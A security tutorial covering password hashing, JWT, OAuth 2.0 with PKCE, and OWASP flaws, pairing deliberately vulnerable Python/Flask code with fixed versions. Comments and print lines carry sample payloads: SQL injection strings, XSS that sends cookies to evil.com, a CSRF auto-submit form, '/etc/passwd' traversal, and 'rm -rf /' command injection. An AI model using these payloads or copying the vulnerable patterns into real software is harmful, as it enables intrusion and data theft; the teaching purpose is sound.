OAuth 2.0, JWT, OWASP Top 10, and Production Security Best Practices
This page contains intentional examples of security vulnerabilities (XSS, SQL injection, etc.) for educational purposes. All code examples showing attacks are properly escaped and will not execute. If your browser shows security warnings, this is expected - these are teaching examples of what NOT to do in production.
Safe to view: All malicious code is displayed as text within code blocks and cannot execute.
Every senior engineer must understand authentication, authorization, and common vulnerabilities. A single security flaw can compromise an entire system. This guide covers production-ready security patterns.
| Aspect | Authentication | Authorization |
|---|---|---|
| Question | Who are you? | What can you do? |
| Purpose | Verify identity | Check permissions |
| Example | Login with username/password | Can user edit this document? |
| Methods | Password, OAuth, Biometric, MFA | RBAC, ABAC, ACLs |
| Happens | First (before authorization) | Second (after authentication) |
Storing passwords in plaintext is a critical vulnerability. If your database is compromised, all user accounts are instantly exposed.
import bcrypt
import hashlib
import os
# ❌ BAD - Plaintext password storage
class BadPasswordStorage:
"""NEVER DO THIS - Plaintext passwords"""
def store_password(self, username, password):
# Disaster waiting to happen
db.save(username, password) # Plaintext!
# ❌ BAD - Simple hashing without salt
class WeakPasswordStorage:
"""NEVER DO THIS - No salt = vulnerable to rainbow tables"""
def store_password(self, username, password):
# Vulnerable to rainbow table attacks
password_hash = hashlib.sha256(password.encode()).hexdigest()
db.save(username, password_hash)
# ✅ GOOD - Bcrypt with salt (automatic)
class SecurePasswordStorage:
"""
Use bcrypt for password hashing
Why bcrypt?
- Automatic salting (unique salt per password)
- Adaptive (can increase cost factor as hardware improves)
- Slow by design (prevents brute force)
"""
def hash_password(self, password: str) -> bytes:
"""Hash a password using bcrypt"""
# Generate salt and hash password
salt = bcrypt.gensalt(rounds=12) # Cost factor 12
password_hash = bcrypt.hashpw(password.encode('utf-8'), salt)
return password_hash
def verify_password(self, password: str, password_hash: bytes) -> bool:
"""Verify a password against its hash"""
return bcrypt.checkpw(password.encode('utf-8'), password_hash)
# ✅ GOOD - Argon2 (even better, winner of password hashing competition)
from argon2 import PasswordHasher
class Argon2PasswordStorage:
"""
Argon2 - Modern password hashing (recommended)
Winner of Password Hashing Competition (2015)
Resistant to:
- GPU attacks
- Side-channel attacks
- Memory-hard (expensive to crack)
"""
def __init__(self):
self.ph = PasswordHasher(
time_cost=2, # Number of iterations
memory_cost=65536, # Memory usage (64 MB)
parallelism=1 # Number of threads
)
def hash_password(self, password: str) -> str:
return self.ph.hash(password)
def verify_password(self, password: str, password_hash: str) -> bool:
try:
self.ph.verify(password_hash, password)
return True
except:
return False
# Usage example
storage = SecurePasswordStorage()
# Registration
password = "SuperSecret123!"
password_hash = storage.hash_password(password)
print(f"Hash: {password_hash}")
# Login
is_valid = storage.verify_password("SuperSecret123!", password_hash)
print(f"Password valid: {is_valid}") # True
is_valid = storage.verify_password("WrongPassword", password_hash)
print(f"Wrong password: {is_valid}") # False
import re
class PasswordValidator:
"""
Validate password strength
Requirements:
- Minimum 12 characters (NIST recommendation)
- At least one uppercase, lowercase, digit, special char
- Not in common password list
- Not similar to username
"""
def __init__(self):
# Load common passwords (e.g., from haveibeenpwned)
self.common_passwords = self._load_common_passwords()
def validate_password(self, password: str, username: str = None) -> tuple[bool, list[str]]:
"""
Validate password strength
Returns: (is_valid, list_of_errors)
"""
errors = []
# Length check
if len(password) < 12:
errors.append("Password must be at least 12 characters")
# Complexity checks
if not re.search(r'[A-Z]', password):
errors.append("Password must contain uppercase letter")
if not re.search(r'[a-z]', password):
errors.append("Password must contain lowercase letter")
if not re.search(r'\d', password):
errors.append("Password must contain digit")
if not re.search(r'[!@#$%^&*(),.?":{}|<>]', password):
errors.append("Password must contain special character")
# Common password check
if password.lower() in self.common_passwords:
errors.append("Password is too common")
# Username similarity check
if username and username.lower() in password.lower():
errors.append("Password cannot contain username")
return (len(errors) == 0, errors)
def _load_common_passwords(self) -> set:
"""Load common passwords from file or API"""
# In production, load from file or API
return {
'password', 'password123', '123456', 'qwerty',
'letmein', 'welcome', 'admin', 'root'
}
# Usage
validator = PasswordValidator()
is_valid, errors = validator.validate_password("Pass123!", "john")
if not is_valid:
print("Password errors:")
for error in errors:
print(f" - {error}")
header.payload.signature
import jwt
import datetime
from typing import Dict, Optional
class JWTManager:
"""
JWT token management for authentication
Use cases:
- Stateless authentication
- API authentication
- Single Sign-On (SSO)
Security considerations:
- Use strong secret keys (256+ bits)
- Set short expiration times
- Implement token refresh mechanism
- Store secrets in environment variables
- Use HTTPS only
"""
def __init__(self, secret_key: str, algorithm: str = 'HS256'):
self.secret_key = secret_key
self.algorithm = algorithm
self.access_token_expiry = datetime.timedelta(minutes=15) # Short-lived
self.refresh_token_expiry = datetime.timedelta(days=7) # Long-lived
def create_access_token(self, user_id: int, email: str, roles: list = None) -> str:
"""
Create short-lived access token
Access tokens:
- Short expiration (15 minutes typical)
- Contains user identity and permissions
- Used for API requests
"""
payload = {
'user_id': user_id,
'email': email,
'roles': roles or [],
'exp': datetime.datetime.utcnow() + self.access_token_expiry,
'iat': datetime.datetime.utcnow(), # Issued at
'type': 'access'
}
token = jwt.encode(payload, self.secret_key, algorithm=self.algorithm)
return token
def create_refresh_token(self, user_id: int) -> str:
"""
Create long-lived refresh token
Refresh tokens:
- Longer expiration (7 days typical)
- Only used to get new access tokens
- Should be stored securely (httpOnly cookie)
- Can be revoked (store in DB)
"""
payload = {
'user_id': user_id,
'exp': datetime.datetime.utcnow() + self.refresh_token_expiry,
'iat': datetime.datetime.utcnow(),
'type': 'refresh'
}
token = jwt.encode(payload, self.secret_key, algorithm=self.algorithm)
return token
def verify_token(self, token: str, token_type: str = 'access') -> Optional[Dict]:
"""
Verify and decode JWT token
Returns payload if valid, None if invalid
"""
try:
payload = jwt.decode(
token,
self.secret_key,
algorithms=[self.algorithm]
)
# Verify token type
if payload.get('type') != token_type:
return None
return payload
except jwt.ExpiredSignatureError:
print("Token expired")
return None
except jwt.InvalidTokenError:
print("Invalid token")
return None
def refresh_access_token(self, refresh_token: str) -> Optional[str]:
"""
Use refresh token to get new access token
"""
payload = self.verify_token(refresh_token, token_type='refresh')
if not payload:
return None
# In production, check if refresh token is revoked (DB lookup)
# if is_token_revoked(refresh_token):
# return None
# Create new access token
user_id = payload['user_id']
# Fetch user from DB to get current roles
# user = db.get_user(user_id)
return self.create_access_token(
user_id=user_id,
email="user@example.com", # Fetch from DB
roles=["user", "admin"] # Fetch from DB
)
# Usage example
jwt_manager = JWTManager(secret_key="your-secret-key-min-256-bits")
# Login - create tokens
access_token = jwt_manager.create_access_token(
user_id=123,
email="john@example.com",
roles=["user", "admin"]
)
refresh_token = jwt_manager.create_refresh_token(user_id=123)
print(f"Access token: {access_token[:50]}...")
print(f"Refresh token: {refresh_token[:50]}...")
# API request - verify access token
payload = jwt_manager.verify_token(access_token)
if payload:
print(f"Authenticated user: {payload['email']}")
print(f"Roles: {payload['roles']}")
# Access token expired - use refresh token
new_access_token = jwt_manager.refresh_access_token(refresh_token)
if new_access_token:
print("New access token issued")
| Flow | Use Case | Tokens | Security |
|---|---|---|---|
| Authorization Code | Web apps with backend | Access + Refresh | Most secure (with PKCE) |
| Client Credentials | Machine-to-machine (M2M) | Access only | Secure (no user context) |
| Implicit | ❌ Deprecated (SPAs) | Access only | Insecure (token in URL) |
| Password | ❌ Deprecated (legacy) | Access + Refresh | Low (shares password) |
| Auth Code + PKCE | SPAs, Mobile apps | Access + Refresh | Secure (modern standard) |
from flask import Flask, request, redirect, session, url_for
import requests
import secrets
import hashlib
import base64
app = Flask(__name__)
app.secret_key = secrets.token_hex(32)
class OAuth2Client:
"""
OAuth 2.0 Authorization Code Flow with PKCE
Flow:
1. Generate code verifier & challenge (PKCE)
2. Redirect user to authorization server
3. User authenticates and approves
4. Receive authorization code
5. Exchange code for access token (with verifier)
6. Use access token to access resources
PKCE (Proof Key for Code Exchange):
- Prevents authorization code interception
- Required for public clients (SPAs, mobile)
- Recommended for all OAuth clients
"""
def __init__(self, client_id: str, client_secret: str,
auth_url: str, token_url: str, redirect_uri: str):
self.client_id = client_id
self.client_secret = client_secret
self.auth_url = auth_url
self.token_url = token_url
self.redirect_uri = redirect_uri
def generate_pkce_pair(self) -> tuple[str, str]:
"""
Generate PKCE code verifier and challenge
Verifier: Random string (43-128 chars)
Challenge: SHA256(verifier), base64 encoded
"""
# Generate code verifier (random string)
code_verifier = base64.urlsafe_b64encode(
secrets.token_bytes(32)
).decode('utf-8').rstrip('=')
# Generate code challenge (SHA256 of verifier)
challenge = hashlib.sha256(code_verifier.encode('utf-8')).digest()
code_challenge = base64.urlsafe_b64encode(challenge).decode('utf-8').rstrip('=')
return code_verifier, code_challenge
def get_authorization_url(self, state: str, code_challenge: str) -> str:
"""
Build authorization URL
Parameters:
- response_type: 'code' for authorization code flow
- client_id: Your application's ID
- redirect_uri: Where to send user after auth
- scope: Permissions requested
- state: CSRF protection token
- code_challenge: PKCE challenge
- code_challenge_method: 'S256' (SHA256)
"""
params = {
'response_type': 'code',
'client_id': self.client_id,
'redirect_uri': self.redirect_uri,
'scope': 'openid profile email',
'state': state,
'code_challenge': code_challenge,
'code_challenge_method': 'S256'
}
query_string = '&'.join([f"{k}={v}" for k, v in params.items()])
return f"{self.auth_url}?{query_string}"
def exchange_code_for_token(self, code: str, code_verifier: str) -> dict:
"""
Exchange authorization code for access token
POST to token endpoint with:
- grant_type: 'authorization_code'
- code: Authorization code received
- redirect_uri: Must match original
- client_id: Your application ID
- code_verifier: PKCE verifier
"""
data = {
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': self.redirect_uri,
'client_id': self.client_id,
'code_verifier': code_verifier
}
# For confidential clients, include client_secret
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
# Client authentication (Basic Auth)
auth = (self.client_id, self.client_secret)
response = requests.post(
self.token_url,
data=data,
headers=headers,
auth=auth
)
if response.status_code == 200:
return response.json()
else:
raise Exception(f"Token exchange failed: {response.text}")
def refresh_access_token(self, refresh_token: str) -> dict:
"""
Use refresh token to get new access token
"""
data = {
'grant_type': 'refresh_token',
'refresh_token': refresh_token,
'client_id': self.client_id
}
auth = (self.client_id, self.client_secret)
response = requests.post(
self.token_url,
data=data,
auth=auth
)
if response.status_code == 200:
return response.json()
else:
raise Exception(f"Token refresh failed: {response.text}")
# Flask routes implementing OAuth flow
oauth_client = OAuth2Client(
client_id="your-client-id",
client_secret="your-client-secret",
auth_url="https://provider.com/oauth/authorize",
token_url="https://provider.com/oauth/token",
redirect_uri="http://localhost:5000/callback"
)
@app.route('/login')
def login():
"""
Initiate OAuth flow
"""
# Generate PKCE pair
code_verifier, code_challenge = oauth_client.generate_pkce_pair()
# Generate state for CSRF protection
state = secrets.token_hex(16)
# Store in session (server-side)
session['oauth_state'] = state
session['code_verifier'] = code_verifier
# Redirect to authorization server
auth_url = oauth_client.get_authorization_url(state, code_challenge)
return redirect(auth_url)
@app.route('/callback')
def callback():
"""
Handle OAuth callback
"""
# Verify state (CSRF protection)
state = request.args.get('state')
if state != session.get('oauth_state'):
return "Invalid state parameter", 400
# Get authorization code
code = request.args.get('code')
if not code:
error = request.args.get('error')
return f"Authorization failed: {error}", 400
# Exchange code for token
code_verifier = session.get('code_verifier')
try:
token_response = oauth_client.exchange_code_for_token(code, code_verifier)
# Store tokens securely
session['access_token'] = token_response['access_token']
session['refresh_token'] = token_response.get('refresh_token')
# Clear PKCE values
session.pop('oauth_state', None)
session.pop('code_verifier', None)
return "Login successful!"
except Exception as e:
return f"Token exchange failed: {str(e)}", 500
@app.route('/api/protected')
def protected_resource():
"""
Access protected resource with access token
"""
access_token = session.get('access_token')
if not access_token:
return "Unauthorized", 401
# Use access token to call API
headers = {'Authorization': f'Bearer {access_token}'}
response = requests.get('https://api.provider.com/user', headers=headers)
if response.status_code == 401:
# Token expired, try refresh
refresh_token = session.get('refresh_token')
if refresh_token:
try:
new_tokens = oauth_client.refresh_access_token(refresh_token)
session['access_token'] = new_tokens['access_token']
# Retry request
headers = {'Authorization': f'Bearer {new_tokens["access_token"]}'}
response = requests.get('https://api.provider.com/user', headers=headers)
except:
return "Session expired, please login again", 401
return response.json()
| Feature | OAuth 2.0 | OpenID Connect (OIDC) |
|---|---|---|
| Purpose | Authorization | Authentication + Authorization |
| Use Case | API access delegation | User login (SSO) |
| Tokens | Access token (opaque) | Access + ID token (JWT) |
| User Info | Not standardized | Standard claims in ID token |
| Examples | GitHub API access | Google Sign-In, "Login with Facebook" |
OIDC adds an ID token (JWT) that contains user identity information (name, email, etc.). The ID token is for the client, the access token is for the API.
Risk: Attackers can execute arbitrary SQL commands, read/modify/delete data, or gain admin access.
import sqlite3
import psycopg2
from typing import Optional
# ❌ VULNERABLE - SQL Injection
class VulnerableUserDB:
"""NEVER DO THIS - String concatenation with user input"""
def get_user(self, username: str) -> Optional[dict]:
# VULNERABLE: Attacker can inject SQL
# Input: "admin' OR '1'='1" bypasses authentication
query = f"SELECT * FROM users WHERE username = '{username}'"
cursor = self.conn.execute(query)
return cursor.fetchone()
def login(self, username: str, password: str) -> bool:
# VULNERABLE: SQL injection
# Input: username="admin' --" ignores password check
query = f"""
SELECT * FROM users
WHERE username = '{username}' AND password = '{password}'
"""
cursor = self.conn.execute(query)
return cursor.fetchone() is not None
# ✅ SECURE - Parameterized queries
class SecureUserDB:
"""
Always use parameterized queries / prepared statements
Database drivers automatically escape user input
Prevents SQL injection attacks
"""
def __init__(self, db_path: str):
self.conn = sqlite3.connect(db_path)
def get_user(self, username: str) -> Optional[dict]:
"""Safe: Uses parameterized query"""
query = "SELECT * FROM users WHERE username = ?"
cursor = self.conn.execute(query, (username,))
return cursor.fetchone()
def login(self, username: str, password_hash: str) -> bool:
"""Safe: Parameterized query with placeholders"""
query = """
SELECT * FROM users
WHERE username = ? AND password_hash = ?
"""
cursor = self.conn.execute(query, (username, password_hash))
return cursor.fetchone() is not None
def search_users(self, search_term: str) -> list:
"""Safe: Even with LIKE, use parameters"""
query = "SELECT * FROM users WHERE name LIKE ?"
cursor = self.conn.execute(query, (f'%{search_term}%',))
return cursor.fetchall()
# ✅ SECURE - ORM (SQLAlchemy)
from sqlalchemy import create_engine, Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True)
username = Column(String, unique=True)
password_hash = Column(String)
class SecureUserORM:
"""
ORMs automatically use parameterized queries
SQLAlchemy, Django ORM, etc. protect against SQL injection
"""
def __init__(self, db_url: str):
engine = create_engine(db_url)
Session = sessionmaker(bind=engine)
self.session = Session()
def get_user(self, username: str) -> Optional[User]:
"""Safe: ORM uses parameters"""
return self.session.query(User).filter(User.username == username).first()
def search_users(self, search_term: str) -> list:
"""Safe: Even with LIKE"""
return self.session.query(User).filter(
User.username.like(f'%{search_term}%')
).all()
# Demonstrating the vulnerability
print("=== SQL Injection Example ===")
print("Malicious input: admin' OR '1'='1")
print("Resulting query: SELECT * FROM users WHERE username = 'admin' OR '1'='1'")
print("Effect: Returns all users (bypasses authentication)")
Risk: Attackers inject malicious scripts that execute in victims' browsers, stealing cookies, session tokens, or performing actions as the user.
from flask import Flask, render_template_string, request, escape
from markupsafe import Markup
import bleach
app = Flask(__name__)
# ❌ VULNERABLE - Reflected XSS
@app.route('/search_bad')
def search_bad():
"""NEVER DO THIS - Directly rendering user input"""
query = request.args.get('q', '')
# VULNERABLE: User input rendered without escaping
# Attack: /search?q=<script>alert('XSS')</script>
html = f"<h1>Search results for: {query}</h1>"
return html
# ❌ VULNERABLE - Stored XSS
@app.route('/comment_bad', methods=['POST'])
def comment_bad():
"""NEVER DO THIS - Storing and displaying unsanitized input"""
comment = request.form.get('comment')
# VULNERABLE: Stores malicious script in database
# Attack: comment="<script>document.location='http://evil.com?cookie='+document.cookie</script>"
db.save_comment(comment) # Stores XSS payload
# Later, when displaying comments (vulnerable):
# return f"<div>{comment}</div>" # Executes script
# ✅ SECURE - Auto-escaping with Jinja2
@app.route('/search_safe')
def search_safe():
"""Safe: Jinja2 auto-escapes by default"""
query = request.args.get('q', '')
# Jinja2 automatically escapes HTML
template = """
Search results for: {{ query }}
"""
return render_template_string(template, query=query)
# ✅ SECURE - Manual escaping
@app.route('/search_escape')
def search_escape():
"""Safe: Explicitly escape user input"""
query = request.args.get('q', '')
# Escape HTML characters
safe_query = escape(query)
html = f"Search results for: {safe_query}
"
return html
# ✅ SECURE - Sanitizing HTML input (for rich text)
class HTMLSanitizer:
"""
Sanitize HTML input when you need to allow some HTML
Use case: Blog comments, rich text editors
Strategy: Whitelist allowed tags and attributes
"""
def __init__(self):
# Allowed tags
self.allowed_tags = [
'p', 'br', 'strong', 'em', 'u', 'a', 'ul', 'ol', 'li',
'h1', 'h2', 'h3', 'blockquote', 'code', 'pre'
]
# Allowed attributes per tag
self.allowed_attributes = {
'a': ['href', 'title'],
'*': ['class'] # Allow class on all tags
}
def sanitize(self, html_input: str) -> str:
"""
Sanitize HTML using bleach library
Bleach:
- Whitelists allowed tags and attributes
- Removes everything else
- Escapes remaining content
"""
clean_html = bleach.clean(
html_input,
tags=self.allowed_tags,
attributes=self.allowed_attributes,
strip=True # Remove disallowed tags
)
# Also validate URLs in links
clean_html = bleach.linkify(
clean_html,
callbacks=[self._validate_url]
)
return clean_html
def _validate_url(self, attrs, new=False):
"""Validate that URLs are safe (no javascript:)"""
href = attrs.get('href', '')
if href.startswith('javascript:'):
return None # Remove the link
# Only allow http(s) and mailto
if not (href.startswith('http://') or
href.startswith('https://') or
href.startswith('mailto:')):
return None
return attrs
@app.route('/comment_safe', methods=['POST'])
def comment_safe():
"""Safe: Sanitize HTML input"""
comment = request.form.get('comment')
sanitizer = HTMLSanitizer()
safe_comment = sanitizer.sanitize(comment)
# Store sanitized comment
db.save_comment(safe_comment)
return "Comment saved"
# Content Security Policy (CSP) header
@app.after_request
def add_security_headers(response):
"""
Add security headers to prevent XSS
Content-Security-Policy:
- Defines which sources browser can load resources from
- Prevents inline scripts (defeats XSS)
"""
response.headers['Content-Security-Policy'] = (
"default-src 'self'; "
"script-src 'self' https://trusted-cdn.com; "
"style-src 'self' 'unsafe-inline'; "
"img-src 'self' data: https:; "
"font-src 'self'; "
"connect-src 'self'; "
"frame-ancestors 'none'"
)
# Prevent MIME type sniffing
response.headers['X-Content-Type-Options'] = 'nosniff'
# Enable XSS filter
response.headers['X-XSS-Protection'] = '1; mode=block'
return response
# Example attacks and defenses
print("=== XSS Attack Examples ===")
print("Reflected XSS: /search?q=<script>alert('XSS')</script>")
print("Stored XSS: <script>fetch('http://evil.com?cookie='+document.cookie)</script>")
print("DOM XSS: document.write(location.hash)")
Risk: Attackers trick authenticated users into performing unwanted actions (delete account, transfer money, change email).
from flask import Flask, request, session, render_template_string
import secrets
import hmac
import hashlib
app = Flask(__name__)
app.secret_key = secrets.token_hex(32)
# ❌ VULNERABLE - No CSRF protection
@app.route('/transfer_bad', methods=['POST'])
def transfer_money_bad():
"""
VULNERABLE: No CSRF token
Attack scenario:
1. User logs into bank.com
2. User visits evil.com (attacker's site)
3. evil.com has hidden form:
<form action="https://bank.com/transfer" method="POST">
<input name="to" value="attacker_account">
<input name="amount" value="1000">
</form>
<script>document.forms[0].submit()</script>
4. Form submits with user's cookies (authenticated session)
5. Money transferred without user's knowledge
"""
to_account = request.form.get('to')
amount = request.form.get('amount')
# No CSRF check - processes any POST request
process_transfer(to_account, amount)
return "Transfer complete"
# ✅ SECURE - CSRF token protection
class CSRFProtection:
"""
CSRF protection using synchronizer tokens
How it works:
1. Generate random token on form load
2. Store token in session (server-side)
3. Include token in form as hidden field
4. Verify token on form submission
5. Reject if token missing or doesn't match
Why it works:
- Attacker can't read token (same-origin policy)
- Attacker can't guess token (cryptographically random)
- Token tied to user's session
"""
@staticmethod
def generate_token() -> str:
"""Generate CSRF token"""
token = secrets.token_hex(32)
session['csrf_token'] = token
return token
@staticmethod
def validate_token(token: str) -> bool:
"""Validate CSRF token"""
session_token = session.get('csrf_token')
if not session_token or not token:
return False
# Use constant-time comparison to prevent timing attacks
return hmac.compare_digest(session_token, token)
@app.route('/transfer_form')
def transfer_form():
"""Display form with CSRF token"""
csrf_token = CSRFProtection.generate_token()
template = """
"""
return render_template_string(template, csrf_token=csrf_token)
@app.route('/transfer', methods=['POST'])
def transfer_money():
"""Process transfer with CSRF protection"""
csrf_token = request.form.get('csrf_token')
# Validate CSRF token
if not CSRFProtection.validate_token(csrf_token):
return "CSRF token validation failed", 403
to_account = request.form.get('to')
amount = request.form.get('amount')
process_transfer(to_account, amount)
return "Transfer complete"
# ✅ SECURE - Double Submit Cookie pattern
class DoubleSubmitCSRF:
"""
Alternative CSRF protection: Double Submit Cookie
How it works:
1. Set CSRF token in cookie
2. Include same token in form/header
3. Verify cookie value == form/header value
Advantage: No server-side storage needed (stateless)
Works for: APIs, distributed systems
"""
@staticmethod
def set_csrf_cookie(response):
"""Set CSRF token in cookie"""
token = secrets.token_hex(32)
response.set_cookie(
'csrf_token',
token,
httponly=False, # JavaScript needs to read it
samesite='Strict',
secure=True # HTTPS only
)
return token
@staticmethod
def validate_token(cookie_token: str, form_token: str) -> bool:
"""Validate that cookie and form tokens match"""
if not cookie_token or not form_token:
return False
return hmac.compare_digest(cookie_token, form_token)
# ✅ SECURE - SameSite cookie attribute
@app.route('/set_session')
def set_session():
"""
Use SameSite cookie attribute for CSRF protection
SameSite options:
- Strict: Cookie not sent on cross-site requests (best security)
- Lax: Cookie sent on top-level navigation (GET only)
- None: Cookie sent on all requests (requires Secure flag)
Modern browsers support SameSite, provides automatic CSRF protection
"""
from flask import make_response
response = make_response("Session set")
response.set_cookie(
'session_id',
'abc123',
httponly=True, # Prevents JavaScript access
secure=True, # HTTPS only
samesite='Strict' # CSRF protection
)
return response
# Flask-WTF integration (recommended for Flask)
from flask_wtf import FlaskForm, CSRFProtect
from wtforms import StringField, IntegerField
from wtforms.validators import DataRequired
csrf = CSRFProtect(app)
class TransferForm(FlaskForm):
"""Flask-WTF automatically handles CSRF tokens"""
to_account = StringField('To', validators=[DataRequired()])
amount = IntegerField('Amount', validators=[DataRequired()])
@app.route('/transfer_wtf', methods=['GET', 'POST'])
def transfer_wtf():
"""Using Flask-WTF (handles CSRF automatically)"""
form = TransferForm()
if form.validate_on_submit():
# CSRF token automatically validated
to_account = form.to_account.data
amount = form.amount.data
process_transfer(to_account, amount)
return "Transfer complete"
return render_template_string("""
""", form=form)
# ✅ Insecure Deserialization Prevention
import json
import pickle
class SecureDeserialization:
"""
Insecure deserialization can lead to Remote Code Execution (RCE)
NEVER use pickle with untrusted data
Use JSON instead (safe, only basic types)
"""
@staticmethod
def bad_deserialize(data: bytes):
"""❌ DANGEROUS: pickle can execute arbitrary code"""
return pickle.loads(data) # RCE vulnerability!
@staticmethod
def safe_deserialize(data: str) -> dict:
"""✅ SAFE: JSON only deserializes basic types"""
return json.loads(data)
# ✅ Path Traversal Prevention
import os
from pathlib import Path
class SecureFileAccess:
"""
Path traversal: Attacker accesses files outside intended directory
Attack: filename="../../../etc/passwd"
"""
def __init__(self, upload_dir: str):
self.upload_dir = Path(upload_dir).resolve()
def get_file_bad(self, filename: str):
"""❌ VULNERABLE: No path validation"""
# Attack: filename="../../etc/passwd"
filepath = os.path.join(self.upload_dir, filename)
return open(filepath, 'r').read()
def get_file_safe(self, filename: str):
"""✅ SAFE: Validate path stays in upload directory"""
# Resolve absolute path
requested_path = (self.upload_dir / filename).resolve()
# Check if path is within upload directory
if not str(requested_path).startswith(str(self.upload_dir)):
raise ValueError("Invalid file path (path traversal attempt)")
# Check if file exists
if not requested_path.exists():
raise FileNotFoundError("File not found")
return requested_path.read_text()
# ✅ Command Injection Prevention
import subprocess
import shlex
class SecureCommandExecution:
"""
Command injection: Attacker executes arbitrary system commands
Attack: filename="file.txt; rm -rf /"
"""
def run_command_bad(self, filename: str):
"""❌ DANGEROUS: Shell injection"""
# Attack: filename="file.txt; rm -rf /"
os.system(f"cat {filename}") # Executes arbitrary commands!
def run_command_safe(self, filename: str):
"""✅ SAFE: Use subprocess with list (no shell)"""
# subprocess with list doesn't invoke shell
# No command injection possible
result = subprocess.run(
['cat', filename],
capture_output=True,
text=True,
shell=False # Critical: don't use shell
)
return result.stdout
def run_command_with_validation(self, filename: str):
"""✅ SAFER: Validate and sanitize input"""
# Whitelist allowed characters
if not filename.replace('_', '').replace('.', '').isalnum():
raise ValueError("Invalid filename")
# Use shlex.quote for additional safety
safe_filename = shlex.quote(filename)
result = subprocess.run(
['cat', safe_filename],
capture_output=True,
text=True,
shell=False
)
return result.stdout
# ✅ XML External Entity (XXE) Prevention
import defusedxml.ElementTree as ET
class SecureXMLParsing:
"""
XXE attack: Attacker uses XML external entities to read files
Attack:
]>
&xxe;
"""
def parse_xml_bad(self, xml_string: str):
"""❌ VULNERABLE: Standard library vulnerable to XXE"""
import xml.etree.ElementTree as StandardET
return StandardET.fromstring(xml_string) # XXE vulnerability!
def parse_xml_safe(self, xml_string: str):
"""✅ SAFE: Use defusedxml library"""
# defusedxml disables external entity processing
return ET.fromstring(xml_string)
from flask import Flask, make_response
class SecurityHeaders:
"""
Essential HTTP security headers
These headers protect against various attacks
Should be set on all responses
"""
@staticmethod
def add_security_headers(response):
"""Add all security headers to response"""
# Prevent clickjacking attacks
response.headers['X-Frame-Options'] = 'DENY'
# Prevent MIME type sniffing
response.headers['X-Content-Type-Options'] = 'nosniff'
# Enable XSS filter in browsers
response.headers['X-XSS-Protection'] = '1; mode=block'
# Content Security Policy (CSP)
# Prevents XSS by controlling resource loading
response.headers['Content-Security-Policy'] = (
"default-src 'self'; "
"script-src 'self' https://trusted-cdn.com; "
"style-src 'self' 'unsafe-inline'; "
"img-src 'self' data: https:; "
"font-src 'self'; "
"connect-src 'self'; "
"frame-ancestors 'none'; "
"base-uri 'self'; "
"form-action 'self'"
)
# HTTP Strict Transport Security (HSTS)
# Forces HTTPS for future requests
response.headers['Strict-Transport-Security'] = (
'max-age=31536000; includeSubDomains; preload'
)
# Referrer Policy
# Controls how much referrer information is sent
response.headers['Referrer-Policy'] = 'strict-origin-when-cross-origin'
# Permissions Policy (formerly Feature Policy)
# Disable dangerous features
response.headers['Permissions-Policy'] = (
'geolocation=(), '
'microphone=(), '
'camera=(), '
'payment=()'
)
return response
# Apply to Flask app
app = Flask(__name__)
@app.after_request
def apply_security_headers(response):
"""Apply security headers to all responses"""
return SecurityHeaders.add_security_headers(response)
from functools import wraps
from flask import request, jsonify
import time
class APISecurityManager:
"""
API security best practices
"""
def __init__(self):
self.rate_limiter = {} # In production, use Redis
self.api_keys = {} # In production, use database
def require_api_key(self, f):
"""
API Key authentication
Usage: @require_api_key
Header: X-API-Key: your-api-key
"""
@wraps(f)
def decorated(*args, **kwargs):
api_key = request.headers.get('X-API-Key')
if not api_key:
return jsonify({'error': 'API key required'}), 401
# Validate API key (constant-time comparison)
if api_key not in self.api_keys:
return jsonify({'error': 'Invalid API key'}), 401
# Add API key info to request context
request.api_key_info = self.api_keys[api_key]
return f(*args, **kwargs)
return decorated
def rate_limit(self, max_requests: int, window_seconds: int):
"""
Rate limiting decorator
Usage: @rate_limit(max_requests=100, window_seconds=60)
Prevents abuse and DDoS attacks
"""
def decorator(f):
@wraps(f)
def decorated(*args, **kwargs):
# Get client identifier (API key, IP, user ID)
client_id = request.headers.get('X-API-Key') or request.remote_addr
current_time = time.time()
key = f"{client_id}:{f.__name__}"
# Get request history
if key not in self.rate_limiter:
self.rate_limiter[key] = []
# Remove old requests outside window
self.rate_limiter[key] = [
t for t in self.rate_limiter[key]
if current_time - t < window_seconds
]
# Check if limit exceeded
if len(self.rate_limiter[key]) >= max_requests:
return jsonify({
'error': 'Rate limit exceeded',
'retry_after': window_seconds
}), 429
# Record this request
self.rate_limiter[key].append(current_time)
return f(*args, **kwargs)
return decorated
return decorator
def validate_content_type(self, expected_type: str):
"""
Validate Content-Type header
Prevents attacks that exploit content type confusion
"""
def decorator(f):
@wraps(f)
def decorated(*args, **kwargs):
content_type = request.headers.get('Content-Type', '')
if not content_type.startswith(expected_type):
return jsonify({
'error': f'Content-Type must be {expected_type}'
}), 415
return f(*args, **kwargs)
return decorated
return decorator
# Usage example
security = APISecurityManager()
@app.route('/api/data')
@security.require_api_key
@security.rate_limit(max_requests=100, window_seconds=60)
@security.validate_content_type('application/json')
def get_data():
"""Secured API endpoint"""
return jsonify({'data': 'sensitive information'})
# CORS Security
from flask_cors import CORS
# ❌ BAD: Allow all origins
CORS(app, origins="*") # Insecure!
# ✅ GOOD: Whitelist specific origins
CORS(app, origins=[
"https://trusted-domain.com",
"https://app.trusted-domain.com"
])